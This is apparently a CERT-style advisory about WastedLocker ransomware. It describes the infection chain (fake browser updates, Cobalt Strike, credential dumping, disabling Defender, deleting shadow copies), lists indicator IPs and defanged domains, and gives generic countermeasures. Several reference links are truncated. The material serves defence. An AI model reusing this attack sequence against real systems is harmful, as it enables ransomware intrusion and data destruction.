Virus Alert
WastedLocker Ransomware
It has been reported that a new ransomware, named as "WastedLocker" is
spreading. The attack is mainly focused on U.S. located organizations of
various industries including manufacturing, media, IT, healthcare and many
more. The ransomware attack is attributed to infamous cybercriminal outfit
"Evil Corp" that was earlier linked to some other dreadful
cyber-attacks also.
Infection Mechanism:
The infection mechanism starts with a malicious JavaScript-based framework
known as "SocGholish" delivered in a zipped file to the victim while
visiting a compromised legitimate website. As reported, at least 150
compromised websites have been discovered. The zipped file contains
malicious JavaScript, masquerading as browser update. Another JavaScript
profiles the computer using various commands like whoami, net user, and net
group and PowerShell is used to download additional scripts.
The next pivotal stage in this attack is to download and execute a loader
from a domain being used to deliver Cobalt Strike threat emulation
software. The loader also contains .NET injector. The injected payload,
known as Cobalt Strike Beacon, can be used to inject other processes and
along with several other tools it can steal credentials, escalate
privileges, and move across the network. Attackers also search all computer
objects in Active Directory database to locate Windows servers and hosts.
Cobalt Strike is also used for credential dumping using "ProcDump".
Before deploying ransomware, attackers disable Windows Defender across
victim's entire network using PowerShell scripts and legitimate tools.
When all the payloads are deployed successfully, Windows Defender is
disabled and services across the organization are stopped, Windows
Sysinternals tool "PsExec" is used to launch WastedLocker ransomware
itself that encrypts the victim's data and deletes Windows shadow volumes
to wipe backups and file snapshots to make recovery impossible.
The threat actors behind this attack are highly experienced and this attack
on victim's network if unidentified and not addressed, can cause
substantial damage.
IOC:
IP Address:
185.189.151.38
185.162.235.167
185.82.127.38
195.123.227.225
38.135.104.189
88.119.175.104
91.219.237.36
91.236.116.63
Domain:
sodality[d0t]mandmsolicitorscom
advokat-hodonin[d0t]info/gate[d0t]php
penaz[d0t]info/gate[d0t]php
lgrarcosbann[d0t]club/index[d0t]php
cofeedback[d0t]com
consultane[d0t]com
feedbackgive[d0t]com
msoftwares[d0t]info
mwebsoft[d0t]com
net-giftshop[d0t]info
rostraffic[d0t]com
traffichi[d0t]com
typiconsult[d0t]com
websitesbuilder[d0t]info
backup[d0t]awarfaregaming[d0t]com
click[d0t]clickanalytics208[d0t]com
connect[d0t]clevelandskin[d0t]com
connect[d0t]clevelandskin[d0t]net
connect[d0t]clevelandskin[d0t]org
cushion[d0t]aiimss[d0t]com
link[d0t]easycounter210[d0t]com
rocket2[d0t]new10k[d0t]com
track[d0t]positiverefreshment[d0t]org
Hashes:
Kindly visit the URL:
stedlocker-ransomware-us
Countermeasures and Best practices for prevention:
Maintain appropriate Firewall policies to block malicious traffic entering
the system/network. Enable a personal firewall on workstation.
Keep updated Antivirus/Antimalware software to detect any threat before it
infects the system/network. Always scan the external drives/removable
devices before use. Leverage anti-phishing solutions that help protect
credentials and against malicious file downloads.
It is also important to keep web filtering tools updated.
Block the IP addresses of known malicious sites to prevent devices from
being able to access them. Activate intelligent website blacklisting to
block known bad websites.
Use limited privilege user on the computer or allow administrative access
to systems with special administrative accounts for administrators.
Block websites hosting JavaScript miners both at the gateway and the
endpoints.
Keep software and OS up-to-date so that attackers may not take advantages
of or exploit known vulnerabilities.
Change default login credentials as they are readily available with
attackers.
Avoid downloading files from untrusted websites.
Go beyond intrusion detection to protect servers with runtime memory
protection
for critical applications and server workloads, ensuring a defense against
actors who already have a grip on your server.
Disable Autorun and Autoplay policies.
Consider using application whitelists to prevent unknown executables from
launching autonomously.
Delete the system changes made by the malware such as files created/
registry entries /services etc.
Monitor traffic generated from client machines to the domains and IP
address mentioned in Installation section.
Disable unnecessary services on agency workstations and servers.
References:
stedlocker-ransomware-us
ed-in-wastedlocker-ransomware-attacks/
ant-developed-by-the-evil-corp-group/
About Cert Advisory
We have created this blog to provide latest security advisory from the india cert for the security vulnerability, threats, attacks and patching required to mitigate any kind of cyber attacks.